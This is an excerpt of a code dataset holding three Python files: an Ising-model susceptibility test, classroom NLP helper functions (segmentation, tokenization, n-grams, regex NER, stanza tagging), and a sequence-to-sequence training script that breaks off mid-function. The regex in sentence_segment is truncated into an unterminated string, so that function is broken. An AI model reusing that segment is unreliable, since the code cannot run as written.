+{"seq_id":"105360123","text":"import rbm_pytorch\nimport ising_methods\nimport numpy as np\n\ntraining_data = \"../../state02.27.txt\"\ndata = np.loadtxt(training_data, delimiter=\",\",skiprows=1, dtype=\"float32\")\n\ntemp = 2.27\nN = 64\nlength = 8\n\nnewshape = data.reshape(-1, length**2)\n\nprint(newshape[0])\n\n\n\nstates = []\n\nfor x in range(len(newshape)):\n\tstates.append(ising_methods.IsingState(newshape[x], length))\n\nprint(ising_methods.susceptibility(states, temp,N))\nprint(ising_methods.heat_capacity(states,temp,N))\n","sub_path":"ising_method_test.py","file_name":"ising_method_test.py","file_ext":"py","file_size_in_byte":478,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"208297540","text":"\"\"\"\nThis is a document containing all of the functions\nneeded to make the 'text' class. \n\"\"\"\n\n\"\"\"\nThis script contain an example Text class\n\nEach function contains:\nAn explanation as well as an example\nYour job as a studygroup is to make the functions in class 2 and 3.\n\nIn class 3 we will then assemble a pipeline using the Text class at the end.\n\n\nI suggest you start from the top and for each function:\n 1) discuss potential solution (e.g. sentence segmentation splitting by \".\")\n 2) implement the simplest solution first for each function\n 3) go back and improve upon the initial function\n\nfor class 2 it would be ideal if you have a simple version of the following\nfunctions:\n sentence_segment\n tokenize\n n_grams\n ner_regex\n\nAdditional stuff which you might add is:\n A function for dependency parsing using stanza\n alternatives to each of the function (e.g. using tokenization using nltk)\n Add a function for stemming\n Add plotting functionality for word frequencies\n Add plotting functionality for dependency trees\n\"\"\"\n\n\n# string to test on:\ntxt = \"\"\"These are several sentences. They will be splittet a lot. It is inevitable. \nIt will happen although J.D. Gould would like it to be otherwise, or se he says.\nThis sentence tests (or intends to) test parenthes\nand exclamations! At least that was the plan.\nAnother thing one might do is the following: testing this.\nAbbreviations like are tricky. Does this come to mind?\nI thought so. The little Martin Jr. thought it was good.\"\"\"\n\n## sentence segmentation:\ndef sentence_segment(txt):\n \"\"\"\n txt (str): Text which you want to be segmented into\n sentences.\n\n Example:\n >>> txt = \"NLP is very cool. It is also useful\"\n >>> sentence_segment(txt)\n [\"NLP is very cool\", \"It is also useful\"]\n \"\"\"\n\n # importing the module re:\n import re\n\n p1 = \"(? trying to match.\n # \\s (also matching to delete). Whitespace\n # (? still lacking Mrs. Smith (to do).\n # newline?\n\n # https://regex101.com/r/nG1gU7/27 (inspiration).\n\n # use our regex:\n splittet = [w.replace(\"\\n\", \"\") for w in re.split(p1, txt)]\n splittet = [re.sub(\"\\n|\\.|\\(|\\)|,\", \"\", w) for w in re.split(p1, txt)]\n\n # has to be done to accommodate the pipeline:\n # list of lists instead of list..\n sentences = [[sent] for sent in splittet if sent != \"\"]\n return sentences\n\n\n\"\"\" Issues: getting the last dot \"\"\"\n\n# testing:\nsentence_seg = sentence_segment(txt)\nprint(sentence_seg)\n\n## tokenization\n## using nltk?\ndef tokenize(sentences):\n \"\"\"\n sentences (list): Sentences which you want to be tokenized\n\n Example:\n >>> sent = [\"NLP is very cool\"]\n >>> tokenize(sent)\n [[\"NLP\", \"is\", \"very\", \"cool\"], [\"It\", \"is\", \"also\", \"useful\"]]\n \"\"\"\n ## importing re:\n import re\n\n ## unlist (fixing issues):\n sentences_flat = [word for w in sentences for word in w]\n\n ## Split these: (keep words like J. D. Gould together)?\n ## More work required here..?\n output = [re.split(\"\\W\", b) for b in sentences_flat]\n\n ## This\n return output\n\n\n# testing:\nsentence_tok = tokenize(sentence_seg)\nprint(sentence_tok)\n\n## n-grams (for unnested list):\n\n## recursion:\ndef n_grams(tokenlist, n):\n \"\"\"\n tokenlist (list): A list of tokens\n n (int): Indicate the n in n-gram. 
n=2 denotes bigrams\n\n creates n-grams from a given tokenlist\n\n Example:\n >>> tokens = [\"NLP\", \"is\", \"very\", \"cool\"]\n >>> n_grams(tokens, n=2)\n [[\"NLP\", \"is\"], [\"is\", \"very\"], [\"very\", \"cool\"]]\n \"\"\"\n\n # initialization:\n master_list = [] # empty list:\n sub_list = [] # empty list\n\n # for loop: (list comprehension?)\n for i in range(\n len(tokenlist) - (n - 1)\n ): # loop through is dependent on n-1 (what gram we do)\n for j in range(n): # how many things we will append\n sub_list.append(tokenlist[i + j]) # append to sub list.\n master_list.append(sub_list) # append sub list to master list.\n sub_list = [] # clear the sub-list.\n\n # return:\n return master_list\n\n\n## n-grams for nested list:\ndef n_grams2(tokenlist, n):\n \"\"\"\n tokenlist (list): A list of tokens\n n (int): Indicate the n in n-gram. n=2 denotes bigrams\n\n creates n-grams from a given tokenlist\n\n Example:\n >>> tokens = [\"NLP\", \"is\", \"very\", \"cool\"]\n >>> n_grams(tokens, n=2)\n [[\"NLP\", \"is\"], [\"is\", \"very\"], [\"very\", \"cool\"]]\n \"\"\"\n\n # initialization:\n lst_complete = [] # empty list.\n lst_sentence = [] # empty list.\n lst_word = [] # empty list.\n\n for i in range(len(tokenlist)): # sentences:\n for j in range(len(tokenlist[i]) - (n - 1)):\n for k in range(n):\n lst_word.append(tokenlist[i][j + k]) # append to word list.\n lst_sentence.append(lst_word) # append to sentence list.\n lst_word = [] # clear word list.\n lst_complete.append(lst_sentence)\n lst_sentence = [] # clear sentence list.\n\n # return:\n return lst_complete\n\n\n## Named entity recognition:\n# Obviously this cannot distinguish anything\n# Starting a sentence (e.g., \"I am\" from \"Michelle is\").\n# So, it is very insufficient.\ndef ner_regex(tokenlist):\n \"\"\"\n tokenlist (list): A list of tokens\n\n performs named entity recognition using regular expressions\n Example:\n >>> sent = [[\"Karl Friston is very cool\"], [\"Darwin is kick-ass\"]]\n >>> ner_regex(sent)\n [[\"Karl Friston\"], [\"Darwin\"]]\n \"\"\"\n\n # import re:\n import re\n\n # capture group and non-capture groups:\n # (reconstructed) naive pattern: any run of capitalized words.\n pattern = re.compile(r\"[A-Z][a-z]+(?: [A-Z][a-z]+)*\")\n\n return [pattern.findall(sent[0]) for sent in tokenlist]\n\n\n## token frequencies:\ndef token_frequencies(tokenlist):\n \"\"\"\n tokenlist (list): A list of tokens\n\n returns a dictionary of token frequencies\n\n Example:\n >>> tokens = [[\"NLP\", \"is\", \"very\", \"cool\"],\n [\"It\", \"is\", \"also\", \"useful\"]]\n >>> token_frequencies(tokens)\n {\"NLP\": 1, \"is\": 2, \"very\": 1, \"cool\": 1, \"It\": 1, \"also\": 1, \"useful\": 1}\n \"\"\"\n # import Counter\n from collections import Counter\n\n # initialize our counter/dictionary:\n token_frq = Counter()\n\n # unlist (we don't care about which sentence for now):\n # this probably only works for \"once\" nested..\n tokens_list = [item for sublist in tokenlist for item in sublist]\n\n # https://docs.python.org/2/library/collections.html\n for word in tokens_list:\n token_frq[word] += 1\n\n return token_frq\n\n\n## Lemmatize using stanza (redundant now)\ndef lemmatize_stanza(tokenlist, return_df=False):\n \"\"\"\n tokenlist (list): A list of tokens\n\n lemmatize a tokenlist using stanza\n \"\"\"\n\n import stanza\n\n nlp = stanza.Pipeline(\n lang=\"en\", processors=\"tokenize,lemma\", tokenize_pretokenized=True\n )\n doc = nlp(tokenlist)\n\n res = [\n (word.lemma) for n_sent, sent in enumerate(doc.sentences) for word in sent.words\n ]\n\n if return_df:\n import pandas as pd\n\n return pd.DataFrame(res)\n return res\n\n\n## POS-tag using stanza (redundant now):\n\n\ndef postag_stanza(tokenlist, return_df=False):\n \"\"\"\n tokenlist (list): A list of tokens\n\n add a part-of-speech (POS) tag to each tokenlist using stanza\n \"\"\"\n\n import 
stanza\n\n nlp = stanza.Pipeline(\n lang=\"en\", processors=\"tokenize,lemma,mwt,pos\", tokenize_pretokenized=True\n )\n\n doc = nlp(tokenlist)\n\n res = [\n (word.lemma, word.pos)\n for n_sent, sent in enumerate(doc.sentences) # n_sent sentence number?\n for word in sent.words\n ]\n\n if return_df:\n import pandas as pd\n\n return pd.DataFrame(res)\n return res\n\n\n### new super-function which returns everything ###\n\n## trouble-shooting:\nsentence_reg = ner_regex(sentence_seg)\nprint(sentence_reg)\n\nlst = []\nfor n, sentence in enumerate(sentence_reg):\n print(n + 1)\n print(sentence)\n if sentence == []:\n placeholder = (n + 1, \"None\", False)\n lst.append(placeholder)\n if sentence != []:\n for i in sentence:\n placeholder = (n + 1, i, True)\n lst.append(placeholder)\n placeholder = None\n\n\"\"\"\n\nimport pandas as pd\n\ntestFrame = pd.DataFrame(lst, columns=[\"sentence num\", \"token\", \"ner\"])\n\ntestFrame\n\n#\nners_clean = [(n_sentence + 1, sent) for n_sentence, sent in enumerate(sentence_reg)]\nners_clean\n\"\"\"\n\n\ndef stanza_panda(segmented, tokenlist, return_df=True):\n \"\"\"\n segmented (list): sentence-segmented text (output of sentence_segment)\n tokenlist (list): A list of tokenized sentences (output of tokenize)\n\n run the stanza pipeline and return sentence number, word number,\n token, lemma and POS-tag for each word\n \"\"\"\n\n import stanza\n\n ## stanza stuff ##\n nlp = stanza.Pipeline(\n lang=\"en\", processors=\"tokenize, mwt, pos, lemma\", tokenize_pretokenized=True\n )\n\n doc = nlp(tokenlist)\n\n ## obtained:\n # n_sent: sentence number\n # sent: token\n # word.lemma: lemma\n # word.pos: POS-tag\n # lacking (ner)..\n\n res = [\n (n_sentence + 1, word.id, word.text, word.lemma, word.pos)\n for n_sentence, sent in enumerate(doc.sentences) # n_sent sentence number?\n for word in sent.words\n ]\n\n # NER on sentences:\n # ners = ner_regex(segmented)\n # ners_clean = [(n_sentence + 1,) for n_sentence, sent in enumerate(ners)]\n\n ## return pandas dataframe ##\n if return_df:\n import pandas as pd\n\n return pd.DataFrame(\n res, columns=[\"sentence num\", \"word num\", \"token\", \"lemma\", \"pos\"]\n )\n return res\n\n\n\"\"\"\n# testing:\nprint(sentence_tok)\nstanza_test = stanza_panda(sentence_seg, sentence_tok, True)\nstanza_test\ntestFrame\n\n## combining (based on order - does not work)\ncombined = pd.concat([stanza_test, testFrame], axis=1, join=\"inner\")\ncombined\n\n## merge left?\nmerged_left = pd.merge(left=stanza_test, right=testFrame, how='left', left_on='species_id', right_on='species_id')\ncombined = pd.DataFrame.merge([stanza_test, testFrame])\ncombined\n\"\"\"\n","sub_path":"classroom_materials/class_02/functions_VMP.py","file_name":"functions_VMP.py","file_ext":"py","file_size_in_byte":10115,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"270047581","text":"from __future__ import division\nimport argparse\nimport logging\nimport math\nimport os\nimport random\nimport re\nimport time\nfrom collections import Counter\nimport numpy as np\nimport scipy.stats as st\nimport torch\nimport torch.nn as nn\nfrom nltk.stem.porter import PorterStemmer\nfrom torch import cuda\nfrom torch.autograd import Variable\nfrom torch.nn.utils.rnn import pack_padded_sequence as pack\nfrom torch.nn.utils.rnn import pad_packed_sequence as unpack\nimport torch.optim as optim\nfrom torch.nn.utils import clip_grad_norm\nfrom torch.optim.optimizer import Optimizer\n\ntry:\n import ipdb\nexcept ImportError:\n pass\nstemmer = PorterStemmer()\n\nPAD = 0\nUNK = 1\nBOS = 2\nEOS = 3\n\nPAD_WORD = ''\nUNK_WORD = ''\nBOS_WORD = ''\nEOS_WORD = ''\n\nlower = True\nseq_length = 100\nreport_every = 100000\nshuffle = 1\n\nlogger = logging.getLogger(__name__)\n\n\ndef add_data_options(parser):\n ## Data options\n parser.add_argument('-save_path', default='./results',\n help=\"\"\"Model filename (the model will be saved as\n _epochN_PPL.pt where PPL is the\n validation perplexity\"\"\")\n\n # tmp solution for load issue\n parser.add_argument('-online_process_data', action=\"store_true\")\n parser.add_argument('-process_shuffle', action=\"store_true\")\n parser.add_argument('-train_src', default='')\n parser.add_argument('-src_vocab', default='')\n parser.add_argument('-train_tgt', default='')\n parser.add_argument('-tgt_vocab', default='')\n\n # Test options\n parser.add_argument('-dev_input_src',\n help='Path to the dev input file.')\n parser.add_argument('-dev_ref',\n help='Path to the dev reference file.')\n parser.add_argument('-beam_size', type=int, default=12,\n help='Beam size')\n parser.add_argument('-max_sent_length', type=int, default=100,\n help='Maximum sentence length.')\n\n\ndef add_model_options(parser):\n ## Model options\n parser.add_argument('-layers', type=int, default=1,\n help='Number of layers in the LSTM encoder/decoder')\n parser.add_argument('-enc_rnn_size', type=int, default=512,\n help='Size of LSTM hidden states')\n parser.add_argument('-dec_rnn_size', type=int, default=512,\n help='Size of LSTM hidden states')\n parser.add_argument('-word_vec_size', type=int, default=300,\n help='Word embedding sizes')\n parser.add_argument('-att_vec_size', type=int, default=512,\n help='Concat attention vector sizes')\n parser.add_argument('-maxout_pool_size', type=int, default=2,\n help='Pooling size for MaxOut layer.')\n parser.add_argument('-input_feed', type=int, default=1,\n help=\"\"\"Feed the context vector at each time step as\n additional input (via concatenation with the word\n embeddings) to the decoder.\"\"\")\n # parser.add_argument('-residual', action=\"store_true\",\n # help=\"Add residual connections between RNN layers.\")\n parser.add_argument('-brnn', action='store_true',\n help='Use a bidirectional encoder')\n parser.add_argument('-brnn_merge', default='concat',\n help=\"\"\"Merge action for the bidirectional hidden states:\n [concat|sum]\"\"\")\n\n\ndef add_train_options(parser):\n ## Optimization options\n parser.add_argument('-batch_size', type=int, default=64,\n help='Maximum batch size')\n parser.add_argument('-max_generator_batches', type=int, default=32,\n help=\"\"\"Maximum batches of words in a sequence to run\n the generator on in parallel. 
Higher is faster, but uses\n more memory.\"\"\")\n parser.add_argument('-epochs', type=int, default=13,\n help='Number of training epochs')\n parser.add_argument('-start_epoch', type=int, default=1,\n help='The epoch from which to start')\n parser.add_argument('-param_init', type=float, default=0.1,\n help=\"\"\"Parameters are initialized over uniform distribution\n with support (-param_init, param_init)\"\"\")\n parser.add_argument('-optim', default='sgd',\n help=\"Optimization method. [sgd|adagrad|adadelta|adam]\")\n parser.add_argument('-max_grad_norm', type=float, default=5,\n help=\"\"\"If the norm of the gradient vector exceeds this,\n renormalize it to have the norm equal to max_grad_norm\"\"\")\n parser.add_argument('-max_weight_value', type=float, default=15,\n help=\"\"\"Clamp model weights so that their absolute value\n does not exceed max_weight_value\"\"\")\n parser.add_argument('-dropout', type=float, default=0.3,\n help='Dropout probability; applied between LSTM stacks.')\n parser.add_argument('-curriculum', type=int, default=1,\n help=\"\"\"For this many epochs, order the minibatches based\n on source sequence length. Sometimes setting this to 1 will\n increase convergence speed.\"\"\")\n parser.add_argument('-extra_shuffle', action=\"store_true\",\n help=\"\"\"By default only shuffle mini-batch order; when true,\n shuffle and re-assign mini-batches\"\"\")\n\n # learning rate\n parser.add_argument('-learning_rate', type=float, default=1.0,\n help=\"\"\"Starting learning rate. If adagrad/adadelta/adam is\n used, then this is the global learning rate. Recommended\n settings: sgd = 1, adagrad = 0.1, adadelta = 1, adam = 0.001\"\"\")\n parser.add_argument('-learning_rate_decay', type=float, default=0.5,\n help=\"\"\"If update_learning_rate, decay learning rate by\n this much if (i) perplexity does not decrease on the\n validation set or (ii) epoch has gone past\n start_decay_at\"\"\")\n parser.add_argument('-start_decay_at', type=int, default=8,\n help=\"\"\"Start decaying every epoch after and including this\n epoch\"\"\")\n parser.add_argument('-start_eval_batch', type=int, default=15000,\n help=\"\"\"start evaluating on dev after this many batches.\"\"\")\n parser.add_argument('-eval_per_batch', type=int, default=1000,\n help=\"\"\"evaluate on dev per x batches.\"\"\")\n parser.add_argument('-halve_lr_bad_count', type=int, default=6,\n help=\"\"\"halve the learning rate after this many dev\n evaluations without improvement.\"\"\")\n\n # pretrained word vectors\n parser.add_argument('-pre_word_vecs_enc',\n help=\"\"\"If a valid path is specified, then this will load\n pretrained word embeddings on the encoder side.\n See README for specific formatting instructions.\"\"\")\n parser.add_argument('-pre_word_vecs_dec',\n help=\"\"\"If a valid path is specified, then this will load\n pretrained word embeddings on the decoder side.\n See README for specific formatting instructions.\"\"\")\n\n # GPU\n parser.add_argument('-gpus', default=[], nargs='+', type=int,\n help=\"Use CUDA on the listed devices.\")\n\n parser.add_argument('-log_interval', type=int, default=100,\n help=\"logger.info stats at this interval.\")\n\n parser.add_argument('-seed', type=int, default=-1,\n help=\"\"\"Random seed used for the experiments\n reproducibility.\"\"\")\n parser.add_argument('-cuda_seed', type=int, default=-1,\n help=\"\"\"Random CUDA seed used for the experiments\n reproducibility.\"\"\")\n\n parser.add_argument('-log_home', default='',\n help=\"\"\"log home\"\"\")\n\n\nparser = 
argparse.ArgumentParser(description='train.py')\nadd_data_options(parser)\nadd_model_options(parser)\nadd_train_options(parser)\n\nopt = parser.parse_args()\nprint(opt)\n\nlogging.basicConfig(format='%(asctime)s [%(levelname)s:%(name)s]: %(message)s', level=logging.INFO)\n# Error DEBUG\nlog_file_name = time.strftime(\"%Y%m%d-%H%M%S\") + '.log.txt'\nif opt.log_home:\n log_file_name = os.path.join(opt.log_home, log_file_name)\nfile_handler = logging.FileHandler(log_file_name, encoding='utf-8')\nfile_handler.setFormatter(logging.Formatter('%(asctime)s [%(levelname)-5.5s:%(name)s] %(message)s'))\nlogging.root.addHandler(file_handler)\n\nlogger.info('My PID is {0}'.format(os.getpid()))\nlogger.info(opt)\n\nif torch.cuda.is_available() and not opt.gpus:\n logger.info(\"WARNING: You have a CUDA device, so you should probably run with -gpus 0\")\n\nif opt.seed > 0:\n torch.manual_seed(opt.seed)\nif opt.gpus:\n if opt.cuda_seed > 0:\n torch.cuda.manual_seed(opt.cuda_seed)\n cuda.set_device(opt.gpus[0])\n\n\nclass Dict(object):\n def __init__(self, data=None, lower=False):\n self.idxToLabel = {}\n self.labelToIdx = {}\n self.frequencies = {}\n self.lower = lower\n\n # Special entries will not be pruned.\n self.special = []\n\n if data is not None:\n if type(data) == str:\n self.loadFile(data)\n else:\n self.addSpecials(data)\n\n def size(self):\n return len(self.idxToLabel)\n\n # Load entries from a file.\n def loadFile(self, filename):\n for line in open(filename, encoding='utf-8'):\n fields = line.split(' ')\n label = fields[0]\n idx = int(fields[1])\n self.add(label, idx)\n\n # Write entries to a file.\n def writeFile(self, filename):\n with open(filename, 'w', encoding='utf-8') as file:\n for i in range(self.size()):\n label = self.idxToLabel[i]\n file.write('%s %d\\n' % (label, i))\n\n def lookup(self, key, default=None):\n key = key.lower() if self.lower else key\n try:\n return self.labelToIdx[key]\n except KeyError:\n return default\n\n def getLabel(self, idx, default=None):\n try:\n return self.idxToLabel[idx]\n except KeyError:\n return default\n\n # Mark this `label` and `idx` as special (i.e. will not be pruned).\n def addSpecial(self, label, idx=None):\n idx = self.add(label, idx)\n self.special += [idx]\n\n # Mark all labels in `labels` as specials (i.e. will not be pruned).\n def addSpecials(self, labels):\n for label in labels:\n self.addSpecial(label)\n\n # Add `label` in the dictionary. Use `idx` as its index if given.\n def add(self, label, idx=None):\n label = label.lower() if self.lower else label\n if idx is not None:\n self.idxToLabel[idx] = label\n self.labelToIdx[label] = idx\n else:\n if label in self.labelToIdx:\n idx = self.labelToIdx[label]\n else:\n idx = len(self.idxToLabel)\n self.idxToLabel[idx] = label\n self.labelToIdx[label] = idx\n\n if idx not in self.frequencies:\n self.frequencies[idx] = 1\n else:\n self.frequencies[idx] += 1\n\n return idx\n\n # Return a new dictionary with the `size` most frequent entries.\n def prune(self, size):\n if size >= self.size():\n return self\n\n # Only keep the `size` most frequent entries.\n freq = torch.Tensor([self.frequencies[i] for i in range(len(self.frequencies))])\n _, idx = torch.sort(freq, 0, True)\n\n newDict = Dict()\n newDict.lower = self.lower\n\n # Add special entries in all cases.\n for i in self.special:\n newDict.addSpecial(self.idxToLabel[i])\n\n for i in idx[:size]:\n newDict.add(self.idxToLabel[i])\n\n return newDict\n\n # Convert `labels` to indices. 
Use `unkWord` if not found.\n # Optionally insert `bosWord` at the beginning and `eosWord` at the end.\n def convertToIdx(self, labels, unkWord, bosWord=None, eosWord=None):\n vec = []\n\n if bosWord is not None:\n vec += [self.lookup(bosWord)]\n\n unk = self.lookup(unkWord)\n vec += [self.lookup(label, default=unk) for label in labels]\n\n if eosWord is not None:\n vec += [self.lookup(eosWord)]\n\n return torch.LongTensor(vec)\n\n # Convert `idx` to labels. If index `stop` is reached, convert it and return.\n def convertToLabels(self, idx, stop):\n labels = []\n\n for i in idx:\n labels += [self.getLabel(i)]\n if i == stop:\n break\n\n return labels\n\n\ndef makeVocabulary(filenames, size):\n vocab = Dict([PAD_WORD, UNK_WORD, BOS_WORD, EOS_WORD], lower=lower)\n for filename in filenames:\n with open(filename, encoding='utf-8') as f:\n for sent in f.readlines():\n for word in sent.strip().split(' '):\n vocab.add(word)\n\n originalSize = vocab.size()\n vocab = vocab.prune(size)\n logger.info('Created dictionary of size %d (pruned from %d)' % (vocab.size(), originalSize))\n\n return vocab\n\n\ndef initVocabulary(name, dataFiles, vocabFile, vocabSize):\n vocab = None\n if vocabFile is not None:\n # If given, load existing word dictionary.\n logger.info('Reading ' + name + ' vocabulary from \\'' + vocabFile + '\\'...')\n vocab = Dict()\n vocab.loadFile(vocabFile)\n logger.info('Loaded ' + str(vocab.size()) + ' ' + name + ' words')\n\n if vocab is None:\n # If a dictionary is still missing, generate it.\n logger.info('Building ' + name + ' vocabulary...')\n genWordVocab = makeVocabulary(dataFiles, vocabSize)\n vocab = genWordVocab\n return vocab\n\n\ndef saveVocabulary(name, vocab, file):\n logger.info('Saving ' + name + ' vocabulary to \\'' + file + '\\'...')\n vocab.writeFile(file)\n\n\ndef makeData(srcFile, tgtFile, srcDicts, tgtDicts):\n src, tgt = [], []\n sizes = []\n count, ignored = 0, 0\n\n logger.info('Processing %s & %s ...' % (srcFile, tgtFile))\n srcF = open(srcFile, encoding='utf-8')\n tgtF = open(tgtFile, encoding='utf-8')\n\n while True:\n sline = srcF.readline()\n tline = tgtF.readline()\n\n # normal end of file\n if sline == \"\" and tline == \"\":\n break\n\n # source or target does not have same number of lines\n if sline == \"\" or tline == \"\":\n logger.info('WARNING: source and target do not have the same number of sentences')\n break\n\n sline = sline.strip()\n tline = tline.strip()\n\n # source and/or target are empty\n if sline == \"\" or tline == \"\":\n logger.info('WARNING: ignoring an empty line (' + str(count + 1) + ')')\n continue\n\n srcWords = sline.split(' ')\n tgtWords = tline.split(' ')\n\n if len(srcWords) <= seq_length and len(tgtWords) <= seq_length:\n src += [srcDicts.convertToIdx(srcWords,\n UNK_WORD)]\n tgt += [tgtDicts.convertToIdx(tgtWords,\n UNK_WORD,\n BOS_WORD,\n EOS_WORD)]\n\n sizes += [len(srcWords)]\n else:\n ignored += 1\n\n count += 1\n\n if count % report_every == 0:\n logger.info('... %d sentences prepared' % count)\n\n srcF.close()\n tgtF.close()\n\n if shuffle == 1:\n logger.info('... shuffling sentences')\n perm = torch.randperm(len(src))\n # torch.randperm(n) returns a random permutation of the integers from 0 to n - 1 (n exclusive).\n src = [src[idx] for idx in perm]\n tgt = [tgt[idx] for idx in perm]\n sizes = [sizes[idx] for idx in perm]\n\n logger.info('... 
sorting sentences by size')\n _, perm = torch.sort(torch.Tensor(sizes))\n src = [src[idx] for idx in perm]\n tgt = [tgt[idx] for idx in perm]\n\n logger.info('Prepared %d sentences (%d ignored due to length == 0 or > %d)' %\n (len(src), ignored, seq_length))\n return src, tgt\n\n\ndef prepare_data_online(train_src, src_vocab, train_tgt, tgt_vocab):\n dicts = {}\n dicts['src'] = initVocabulary('source', [train_src], src_vocab, 0)\n dicts['tgt'] = initVocabulary('target', [train_tgt], tgt_vocab, 0)\n\n logger.info('Preparing training ...')\n train = {}\n train['src'], train['tgt'] = makeData(train_src,\n train_tgt,\n dicts['src'],\n dicts['tgt'])\n\n dataset = {'dicts': dicts,\n 'train': train,\n # 'valid': valid\n }\n return dataset\n\n\n# logger.info('My seed is {0}'.format(torch.initial_seed()))\n# logger.info('My cuda seed is {0}'.format(torch.cuda.initial_seed()))\n\n\nclass Rouge(object):\n def __init__(self, stem=True, use_ngram_buf=False):\n self.N = 2\n self.stem = stem\n self.use_ngram_buf = use_ngram_buf\n self.ngram_buf = {}\n\n @staticmethod\n def _format_sentence(sentence):\n s = sentence.lower()\n s = re.sub(r\"[^0-9a-z]\", \" \", s)\n s = re.sub(r\"\\s+\", \" \", s)\n s = s.strip()\n return s\n\n def _create_n_gram(self, raw_sentence, n, stem):\n if self.use_ngram_buf:\n if raw_sentence in self.ngram_buf:\n return self.ngram_buf[raw_sentence]\n res = {}\n sentence = Rouge._format_sentence(raw_sentence)\n tokens = sentence.split(' ')\n if stem:\n # try: # TODO older NLTK has a bug in Porter Stemmer\n tokens = [stemmer.stem(t) for t in tokens]\n # except:\n # pass\n sent_len = len(tokens)\n for _n in range(n):\n buf = Counter()\n for idx, token in enumerate(tokens):\n if idx + _n >= sent_len:\n break\n ngram = ' '.join(tokens[idx: idx + _n + 1])\n buf[ngram] += 1\n res[_n] = buf\n if self.use_ngram_buf:\n self.ngram_buf[raw_sentence] = res\n return res\n\n def get_ngram(self, sents, N, stem=False):\n if isinstance(sents, list):\n res = {}\n for _n in range(N):\n res[_n] = Counter()\n for sent in sents:\n ngrams = self._create_n_gram(sent, N, stem)\n for this_n, counter in ngrams.items():\n # res[this_n] = res[this_n] + counter\n self_counter = res[this_n]\n for elem, count in counter.items():\n if elem not in self_counter:\n self_counter[elem] = count\n else:\n self_counter[elem] += count\n return res\n elif isinstance(sents, str):\n return self._create_n_gram(sents, N, stem)\n else:\n raise ValueError\n\n def get_mean_sd_internal(self, x):\n mean = np.mean(x)\n sd = st.sem(x)\n res = st.t.interval(0.95, len(x) - 1, loc=mean, scale=sd)\n return (mean, sd, res)\n\n def compute_rouge(self, references, systems):\n assert (len(references) == len(systems))\n\n peer_count = len(references)\n\n result_buf = {}\n for n in range(self.N):\n result_buf[n] = {'p': [], 'r': [], 'f': []}\n\n for ref_sent, sys_sent in zip(references, systems):\n ref_ngrams = self.get_ngram(ref_sent, self.N, self.stem)\n sys_ngrams = self.get_ngram(sys_sent, self.N, self.stem)\n for n in range(self.N):\n ref_ngram = ref_ngrams[n]\n sys_ngram = sys_ngrams[n]\n ref_count = sum(ref_ngram.values())\n sys_count = sum(sys_ngram.values())\n match_count = 0\n for k, v in sys_ngram.items():\n if k in ref_ngram:\n match_count += min(v, ref_ngram[k])\n p = match_count / sys_count if sys_count != 0 else 0\n r = match_count / ref_count if ref_count != 0 else 0\n f = 0 if (p == 0 or r == 0) else 2 * p * r / (p + r)\n result_buf[n]['p'].append(p)\n result_buf[n]['r'].append(r)\n result_buf[n]['f'].append(f)\n\n res = {}\n 
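# Aggregate the per-sample p/r/f lists into (mean, sd, 95% CI) triples per\n # n-gram order; get_mean_sd_internal needs enough samples for a stable interval.\n 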
for n in range(self.N):\n n_key = 'rouge-{0}'.format(n + 1)\n res[n_key] = {}\n if len(result_buf[n]['p']) >= 50:\n res[n_key]['p'] = self.get_mean_sd_internal(result_buf[n]['p'])\n res[n_key]['r'] = self.get_mean_sd_internal(result_buf[n]['r'])\n res[n_key]['f'] = self.get_mean_sd_internal(result_buf[n]['f'])\n else:\n # not enough samples to calculate confidence interval\n res[n_key]['p'] = (np.mean(np.array(result_buf[n]['p'])), 0, (0, 0))\n res[n_key]['r'] = (np.mean(np.array(result_buf[n]['r'])), 0, (0, 0))\n res[n_key]['f'] = (np.mean(np.array(result_buf[n]['f'])), 0, (0, 0))\n\n return res\n\n\ndef calculate_gain(nonlinearity, param=None):\n \"\"\"Return the recommended gain value for the given nonlinearity function. The values are as follows:\n\n ============ ==========================================\n nonlinearity gain\n ============ ==========================================\n linear :math:`1`\n conv{1,2,3}d :math:`1`\n sigmoid :math:`1`\n tanh :math:`5 / 3`\n relu :math:`\\sqrt{2}`\n leaky_relu :math:`\\sqrt{2 / (1 + negative\\_slope^2)}`\n ============ ==========================================\n\n Args:\n nonlinearity: the nonlinear function (`nn.functional` name)\n param: optional parameter for the nonlinear function\n\n Examples:\n >>> gain = nn.init.calculate_gain('leaky_relu')\n \"\"\"\n linear_fns = ['linear', 'conv1d', 'conv2d', 'conv3d', 'conv_transpose1d', 'conv_transpose2d', 'conv_transpose3d']\n if nonlinearity in linear_fns or nonlinearity == 'sigmoid':\n return 1\n elif nonlinearity == 'tanh':\n return 5.0 / 3\n elif nonlinearity == 'relu':\n return math.sqrt(2.0)\n elif nonlinearity == 'leaky_relu':\n if param is None:\n negative_slope = 0.01\n elif not isinstance(param, bool) and isinstance(param, int) or isinstance(param, float):\n # True/False are instances of int, hence check above\n negative_slope = param\n else:\n raise ValueError(\"negative_slope {} not a valid number\".format(param))\n return math.sqrt(2.0 / (1 + negative_slope ** 2))\n else:\n raise ValueError(\"Unsupported nonlinearity {}\".format(nonlinearity))\n\n\ndef uniform(tensor, a=0, b=1):\n \"\"\"Fills the input Tensor or Variable with values drawn from the uniform distribution :math:`U(a, b)`.\n\n Args:\n tensor: an n-dimensional torch.Tensor or autograd.Variable\n a: the lower bound of the uniform distribution\n b: the upper bound of the uniform distribution\n\n Examples:\n >>> w = torch.Tensor(3, 5)\n >>> nn.init.uniform(w)\n \"\"\"\n if isinstance(tensor, Variable):\n uniform(tensor.data, a=a, b=b)\n return tensor\n\n return tensor.uniform_(a, b)\n\n\ndef normal(tensor, mean=0, std=1):\n \"\"\"Fills the input Tensor or Variable with values drawn from the normal distribution :math:`N(mean, std)`.\n\n Args:\n tensor: an n-dimensional torch.Tensor or autograd.Variable\n mean: the mean of the normal distribution\n std: the standard deviation of the normal distribution\n\n Examples:\n >>> w = torch.Tensor(3, 5)\n >>> nn.init.normal(w)\n \"\"\"\n if isinstance(tensor, Variable):\n normal(tensor.data, mean=mean, std=std)\n return tensor\n\n return tensor.normal_(mean, std)\n\n\ndef constant(tensor, val):\n \"\"\"Fills the input Tensor or Variable with the value `val`.\n\n Args:\n tensor: an n-dimensional torch.Tensor or autograd.Variable\n val: the value to fill the tensor with\n\n Examples:\n >>> w = torch.Tensor(3, 5)\n >>> nn.init.constant(w, 0.3)\n \"\"\"\n if isinstance(tensor, 